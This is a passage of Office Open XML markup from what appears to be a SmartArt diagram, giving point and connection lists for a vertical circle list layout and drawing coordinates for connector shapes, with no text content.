    <dgm:pt modelId="{D4028D6C-0EB6-41E2-A633-5EE8D94DF32F}" type="parTrans" cxnId="{4B4CF363-8AAD-454E-84B5-E643F54D6967}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{063FFE7C-448F-494A-B27F-5E86C803817F}" type="sibTrans" cxnId="{4B4CF363-8AAD-454E-84B5-E643F54D6967}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A214BE0-CA72-4D95-B38E-AA95CC1D4AC2}" type="pres">
      <dgm:prSet presAssocID="{AB94D2E9-642A-4767-B794-B8E0BAE8DBDC}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{18A6ED28-D8AD-44F5-A54E-1B8DACEB9DAA}" type="pres">
      <dgm:prSet presAssocID="{493E5AFE-4DA6-4E9A-A8F4-57F65A3B25ED}" presName="noChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{354B2A59-965A-4E0C-AADB-838746803B06}" type="pres">
      <dgm:prSet presAssocID="{493E5AFE-4DA6-4E9A-A8F4-57F65A3B25ED}" presName="gap" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{49D67C0F-16AB-4B9C-88D2-EF03126FDE4F}" type="pres">
      <dgm:prSet presAssocID="{493E5AFE-4DA6-4E9A-A8F4-57F65A3B25ED}" presName="medCircle2" presStyleLbl="vennNode1" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{821C923F-AFD1-45DC-9DED-96127DED69DF}" type="pres">
      <dgm:prSet presAssocID="{493E5AFE-4DA6-4E9A-A8F4-57F65A3B25ED}" presName="txLvlOnly1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{249D4689-4D15-444B-AA15-34F085DE39DB}" type="pres">
      <dgm:prSet presAssocID="{E7CE103F-1BD0-4B49-877E-C6F681B67092}" presName="noChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6314FA40-1456-4868-9F66-B25FD8913865}" type="pres">
      <dgm:prSet presAssocID="{E7CE103F-1BD0-4B49-877E-C6F681B67092}" presName="gap" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{97D90C10-B72B-465C-A840-9720E5568AD5}" type="pres">
      <dgm:prSet presAssocID="{E7CE103F-1BD0-4B49-877E-C6F681B67092}" presName="medCircle2" presStyleLbl="vennNode1" presStyleIdx="1" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7DFD1B01-F7C4-46E4-81A0-8CA0673B8863}" type="pres">
      <dgm:prSet presAssocID="{E7CE103F-1BD0-4B49-877E-C6F681B67092}" presName="txLvlOnly1" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5B9B14DD-DEA7-4FCF-A0F4-36F8F8359F3E}" type="pres">
      <dgm:prSet presAssocID="{A3F21B0F-7E20-47E7-B2C1-329B104534CD}" presName="noChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{27E2EEAE-5C97-495E-ACB7-4AAF84EE813F}" type="pres">
      <dgm:prSet presAssocID="{A3F21B0F-7E20-47E7-B2C1-329B104534CD}" presName="gap" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4F27C2BB-3790-43A6-B3FC-42170389D648}" type="pres">
      <dgm:prSet presAssocID="{A3F21B0F-7E20-47E7-B2C1-329B104534CD}" presName="medCircle2" presStyleLbl="vennNode1" presStyleIdx="2" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{33DECCE9-3F47-4DD2-BFA6-E970E2AB1644}" type="pres">
      <dgm:prSet presAssocID="{A3F21B0F-7E20-47E7-B2C1-329B104534CD}" presName="txLvlOnly1" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D7C9DAF1-3B5C-4E91-855D-AEAEB3CA2298}" type="pres">
      <dgm:prSet presAssocID="{AD664396-1E55-4208-8738-450A006C6DE6}" presName="noChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7497B053-F8DD-4A62-BFF5-E3E51018DD07}" type="pres">
      <dgm:prSet presAssocID="{AD664396-1E55-4208-8738-450A006C6DE6}" presName="gap" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{23C658F0-65FC-4131-A97D-246EAA5ECAD3}" type="pres">
      <dgm:prSet presAssocID="{AD664396-1E55-4208-8738-450A006C6DE6}" presName="medCircle2" presStyleLbl="vennNode1" presStyleIdx="3" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{60FD5D8B-9F66-4838-94DA-76FA5D4CCB13}" type="pres">
      <dgm:prSet presAssocID="{AD664396-1E55-4208-8738-450A006C6DE6}" presName="txLvlOnly1" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{06BD3678-E95A-42A7-B4F1-817A30B3346D}" type="pres">
      <dgm:prSet presAssocID="{7608F411-8A5D-473C-BCB1-6650A6F49AF1}" presName="noChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4822013A-C343-43D2-97CF-C1BDC47DE091}" type="pres">
      <dgm:prSet presAssocID="{7608F411-8A5D-473C-BCB1-6650A6F49AF1}" presName="gap" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2278B80B-133A-45A7-AC6E-38851CED986C}" type="pres">
      <dgm:prSet presAssocID="{7608F411-8A5D-473C-BCB1-6650A6F49AF1}" presName="medCircle2" presStyleLbl="vennNode1" presStyleIdx="4" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{898168FD-4B68-4DD6-82B5-0F37B3C2E0C2}" type="pres">
      <dgm:prSet presAssocID="{7608F411-8A5D-473C-BCB1-6650A6F49AF1}" presName="txLvlOnly1" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E86C33AC-0B20-4748-81C9-52E35DAC33B3}" type="pres">
      <dgm:prSet presAssocID="{6E7BFFD3-E359-4580-B56B-B6C4D675F314}" presName="noChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{50A3536C-94AA-4AD6-976A-74FB22FEF420}" type="pres">
      <dgm:prSet presAssocID="{6E7BFFD3-E359-4580-B56B-B6C4D675F314}" presName="gap" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{30A5B66D-80B2-49F9-90B4-359B4D9DBA78}" type="pres">
      <dgm:prSet presAssocID="{6E7BFFD3-E359-4580-B56B-B6C4D675F314}" presName="medCircle2" presStyleLbl="vennNode1" presStyleIdx="5" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A1567578-90E9-4C1F-AA15-627382938DDE}" type="pres">
      <dgm:prSet presAssocID="{6E7BFFD3-E359-4580-B56B-B6C4D675F314}" presName="txLvlOnly1" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7D122732-FE38-4C4D-8807-B863BA2E8FC7}" srcId="{AB94D2E9-642A-4767-B794-B8E0BAE8DBDC}" destId="{7608F411-8A5D-473C-BCB1-6650A6F49AF1}" srcOrd="4" destOrd="0" parTransId="{7A55469F-84F0-47D4-8FAF-52B424B28559}" sibTransId="{925218ED-43F9-484F-A58B-21043DF084C7}"/>
    <dgm:cxn modelId="{0854E238-0D9D-4904-96EA-CE1C5A6A4767}" type="presOf" srcId="{E7CE103F-1BD0-4B49-877E-C6F681B67092}" destId="{7DFD1B01-F7C4-46E4-81A0-8CA0673B8863}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{4B4CF363-8AAD-454E-84B5-E643F54D6967}" srcId="{AB94D2E9-642A-4767-B794-B8E0BAE8DBDC}" destId="{493E5AFE-4DA6-4E9A-A8F4-57F65A3B25ED}" srcOrd="0" destOrd="0" parTransId="{D4028D6C-0EB6-41E2-A633-5EE8D94DF32F}" sibTransId="{063FFE7C-448F-494A-B27F-5E86C803817F}"/>
    <dgm:cxn modelId="{B70D3E65-4949-45A3-9D38-6F307101104A}" type="presOf" srcId="{7608F411-8A5D-473C-BCB1-6650A6F49AF1}" destId="{898168FD-4B68-4DD6-82B5-0F37B3C2E0C2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{33F27745-7518-424A-8ACA-02373F3D614F}" type="presOf" srcId="{A3F21B0F-7E20-47E7-B2C1-329B104534CD}" destId="{33DECCE9-3F47-4DD2-BFA6-E970E2AB1644}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{67618A67-8365-4867-8923-9753C10F8D97}" srcId="{AB94D2E9-642A-4767-B794-B8E0BAE8DBDC}" destId="{E7CE103F-1BD0-4B49-877E-C6F681B67092}" srcOrd="1" destOrd="0" parTransId="{B6944ABA-4A8E-4602-BC54-32ADE84A36F5}" sibTransId="{27FB2DDC-BDEE-42A2-97DF-C883D058C5A5}"/>
    <dgm:cxn modelId="{FD9FB551-5E99-406F-8199-1C2F38780C06}" srcId="{AB94D2E9-642A-4767-B794-B8E0BAE8DBDC}" destId="{AD664396-1E55-4208-8738-450A006C6DE6}" srcOrd="3" destOrd="0" parTransId="{233AE539-9CDA-4967-AA7D-2E261BC19CEF}" sibTransId="{1EBEC06D-9216-46CB-9198-77414934807B}"/>
    <dgm:cxn modelId="{D0B8A9A2-C368-4B4F-85EE-EB5791860C32}" srcId="{AB94D2E9-642A-4767-B794-B8E0BAE8DBDC}" destId="{A3F21B0F-7E20-47E7-B2C1-329B104534CD}" srcOrd="2" destOrd="0" parTransId="{973600C3-6275-4FAB-BB2C-957C2CF36307}" sibTransId="{E3950B3C-209F-4945-8B4B-9E65CE224F51}"/>
    <dgm:cxn modelId="{E57136C2-5012-401E-B117-B30010E3B0CB}" type="presOf" srcId="{6E7BFFD3-E359-4580-B56B-B6C4D675F314}" destId="{A1567578-90E9-4C1F-AA15-627382938DDE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{3896E0CE-B216-4D57-B2EA-AEBF432CB321}" type="presOf" srcId="{493E5AFE-4DA6-4E9A-A8F4-57F65A3B25ED}" destId="{821C923F-AFD1-45DC-9DED-96127DED69DF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{841689CF-94D7-4D2C-BEEF-D682C12AEAA3}" type="presOf" srcId="{AD664396-1E55-4208-8738-450A006C6DE6}" destId="{60FD5D8B-9F66-4838-94DA-76FA5D4CCB13}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{F8EA42E4-E1F9-4F4E-A2F4-FEA2A1D4EFD7}" type="presOf" srcId="{AB94D2E9-642A-4767-B794-B8E0BAE8DBDC}" destId="{0A214BE0-CA72-4D95-B38E-AA95CC1D4AC2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{1613A2F1-53F7-4FE1-81DC-4B1C50B17106}" srcId="{AB94D2E9-642A-4767-B794-B8E0BAE8DBDC}" destId="{6E7BFFD3-E359-4580-B56B-B6C4D675F314}" srcOrd="5" destOrd="0" parTransId="{6DB46EC8-4E34-44F2-80AE-9104EC34778E}" sibTransId="{2BF1E424-B6C1-4B73-A93D-851B0851F62D}"/>
    <dgm:cxn modelId="{CC772B7C-1EE2-4144-8F62-35C0CEA21D1F}" type="presParOf" srcId="{0A214BE0-CA72-4D95-B38E-AA95CC1D4AC2}" destId="{18A6ED28-D8AD-44F5-A54E-1B8DACEB9DAA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{BB12ED18-7503-4BA6-ADC6-C9F1B3AE24D9}" type="presParOf" srcId="{18A6ED28-D8AD-44F5-A54E-1B8DACEB9DAA}" destId="{354B2A59-965A-4E0C-AADB-838746803B06}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{0994EEC3-6F2E-4F84-A6E8-ABDADE1A5685}" type="presParOf" srcId="{18A6ED28-D8AD-44F5-A54E-1B8DACEB9DAA}" destId="{49D67C0F-16AB-4B9C-88D2-EF03126FDE4F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{A6E7D983-BCF8-4A19-850C-8E134EEA0060}" type="presParOf" srcId="{18A6ED28-D8AD-44F5-A54E-1B8DACEB9DAA}" destId="{821C923F-AFD1-45DC-9DED-96127DED69DF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{F9B1B279-B928-4205-BD90-BD442D40F908}" type="presParOf" srcId="{0A214BE0-CA72-4D95-B38E-AA95CC1D4AC2}" destId="{249D4689-4D15-444B-AA15-34F085DE39DB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{2763DC7C-D969-48F0-A1DD-FBF031AECF97}" type="presParOf" srcId="{249D4689-4D15-444B-AA15-34F085DE39DB}" destId="{6314FA40-1456-4868-9F66-B25FD8913865}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{BA146EA8-0CF1-4649-A2FF-7332619D1251}" type="presParOf" srcId="{249D4689-4D15-444B-AA15-34F085DE39DB}" destId="{97D90C10-B72B-465C-A840-9720E5568AD5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{EB2E8CB4-A003-4147-B5AB-50FDEB5D214D}" type="presParOf" srcId="{249D4689-4D15-444B-AA15-34F085DE39DB}" destId="{7DFD1B01-F7C4-46E4-81A0-8CA0673B8863}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{4AA016DE-DC88-4682-B0B5-64376768EF06}" type="presParOf" srcId="{0A214BE0-CA72-4D95-B38E-AA95CC1D4AC2}" destId="{5B9B14DD-DEA7-4FCF-A0F4-36F8F8359F3E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{343960E6-0942-412A-8372-25A4F33DAAD6}" type="presParOf" srcId="{5B9B14DD-DEA7-4FCF-A0F4-36F8F8359F3E}" destId="{27E2EEAE-5C97-495E-ACB7-4AAF84EE813F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{7B20DB10-F7BB-4AA2-A545-AD75C29B830F}" type="presParOf" srcId="{5B9B14DD-DEA7-4FCF-A0F4-36F8F8359F3E}" destId="{4F27C2BB-3790-43A6-B3FC-42170389D648}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{1C863732-D766-45BD-AADD-15EFFC2FF7D9}" type="presParOf" srcId="{5B9B14DD-DEA7-4FCF-A0F4-36F8F8359F3E}" destId="{33DECCE9-3F47-4DD2-BFA6-E970E2AB1644}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{8F612A22-A255-4347-9177-071C8B685625}" type="presParOf" srcId="{0A214BE0-CA72-4D95-B38E-AA95CC1D4AC2}" destId="{D7C9DAF1-3B5C-4E91-855D-AEAEB3CA2298}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{3583B823-F482-4B55-AE5E-B525BB8C42F6}" type="presParOf" srcId="{D7C9DAF1-3B5C-4E91-855D-AEAEB3CA2298}" destId="{7497B053-F8DD-4A62-BFF5-E3E51018DD07}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{DA4668C1-20CB-4DB0-B860-85D43A2F73DD}" type="presParOf" srcId="{D7C9DAF1-3B5C-4E91-855D-AEAEB3CA2298}" destId="{23C658F0-65FC-4131-A97D-246EAA5ECAD3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{7937A4AF-5BF2-4F02-8C6C-491D8FD76968}" type="presParOf" srcId="{D7C9DAF1-3B5C-4E91-855D-AEAEB3CA2298}" destId="{60FD5D8B-9F66-4838-94DA-76FA5D4CCB13}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{1330AB65-43E7-43B3-9719-A6F36BF13F8E}" type="presParOf" srcId="{0A214BE0-CA72-4D95-B38E-AA95CC1D4AC2}" destId="{06BD3678-E95A-42A7-B4F1-817A30B3346D}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{58B13D05-1D7A-40DB-B424-F63B90A26E30}" type="presParOf" srcId="{06BD3678-E95A-42A7-B4F1-817A30B3346D}" destId="{4822013A-C343-43D2-97CF-C1BDC47DE091}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{5877ED22-1BAE-4E4F-885B-5959C6872D19}" type="presParOf" srcId="{06BD3678-E95A-42A7-B4F1-817A30B3346D}" destId="{2278B80B-133A-45A7-AC6E-38851CED986C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{F42D0B85-146A-4597-9C4B-70C01B1723CF}" type="presParOf" srcId="{06BD3678-E95A-42A7-B4F1-817A30B3346D}" destId="{898168FD-4B68-4DD6-82B5-0F37B3C2E0C2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{EEF85A2F-4D26-4B7F-A3BD-AE21A7E58298}" type="presParOf" srcId="{0A214BE0-CA72-4D95-B38E-AA95CC1D4AC2}" destId="{E86C33AC-0B20-4748-81C9-52E35DAC33B3}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{01A43124-BDC5-4A01-BD17-D97DAEA40FD2}" type="presParOf" srcId="{E86C33AC-0B20-4748-81C9-52E35DAC33B3}" destId="{50A3536C-94AA-4AD6-976A-74FB22FEF420}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{A3FB5D1C-CA3D-4B5E-8D14-96863DDEA075}" type="presParOf" srcId="{E86C33AC-0B20-4748-81C9-52E35DAC33B3}" destId="{30A5B66D-80B2-49F9-90B4-359B4D9DBA78}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{A4802008-2CD6-4509-8381-92C155194A1F}" type="presParOf" srcId="{E86C33AC-0B20-4748-81C9-52E35DAC33B3}" destId="{A1567578-90E9-4C1F-AA15-627382938DD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433B-9BB3-4615-8FB7-BF2578B47590}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7141236" y="5079185"/>
          <a:ext cx="228143" cy="49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490507"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="228143" y="490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B8B25-2C50-4A67-8C46-FE6D1E2C1EF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7141236" y="5033465"/>
          <a:ext cx="228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3F6FF-9C71-47B4-A7EC-79A071EA1881}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7141236" y="4588677"/>
          <a:ext cx="228143" cy="490507"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="490507"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="114071" y="490507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C4B3-EB79-4529-8522-68069794F2FD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5772378" y="5033465"/>
          <a:ext cx="228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119A9-0BCB-44A9-88FF-63BDD1DE80E1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4403520" y="3546349"/>
          <a:ext cx="228143" cy="1532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1532836"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="228143" y="1532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27F0F-C862-4614-9676-5BA6071C4B1C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7141236" y="3607662"/>
          <a:ext cx="228143" cy="49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490507"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="228143" y="490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00F5D-54FA-4F0B-9234-26A0E970A483}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7141236" y="3561942"/>
          <a:ext cx="228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04AF-8507-4CA0-B7EE-F17CE208E743}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7141236" y="3117155"/>
          <a:ext cx="228143" cy="490507"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="490507"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="114071" y="490507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49528-88BD-4BE0-9E66-C53B574E0B72}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5772378" y="2013513"/>
          <a:ext cx="228143" cy="159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1594149"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="228143" y="1594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4EBD0-3BEF-4567-BFCD-8EBF65E13A2A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7141236" y="2381393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245253"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="228143" y="24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AAA8-EE11-49F5-A612-84F960E30C08}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7141236" y="2136140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245253"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="114071" y="245253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747E3-AF7B-4203-A4F0-E2BCFE7B83FC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5772378" y="2013513"/>
          <a:ext cx="228143" cy="36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367880"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="228143" y="36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A74E9-2883-453C-B0A7-08A0FD7BF2EE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7141236" y="1400378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245253"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="228143" y="24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73CDA-5A9B-4DB8-84A9-F7447135C96B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7141236" y="1155125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245253"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="114071" y="245253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62B8B-B013-40B3-A988-B504B4A83352}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5772378" y="1400378"/>
          <a:ext cx="228143" cy="613134"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="613134"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="114071" y="613134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EA8A7-C4C7-44F9-99E2-2A1F434C58E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7141236" y="419363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71" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="114071" y="245253"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="228143" y="24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6E157-6B5E-4D54-9BCE-AC91A6BF1158}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7141236" y="174109"/>
          <a:ext cx="228143" cy="245253"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="245253"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="114071" y="245253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E46AE-8BBE-4C11-AB61-44BB5BC6CB84}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5772378" y="419363"/>
          <a:ext cx="228143" cy="1594149"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="1594149"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="114071" y="1594149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8EC69-C1CF-4A1C-B873-D5C2F35447DE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4403520" y="2013513"/>
          <a:ext cx="228143" cy="1532836"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="1532836"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="114071" y="1532836"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="114071" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="2281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C4EA7-5045-43D8-A7C6-C0806C2E7E02}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
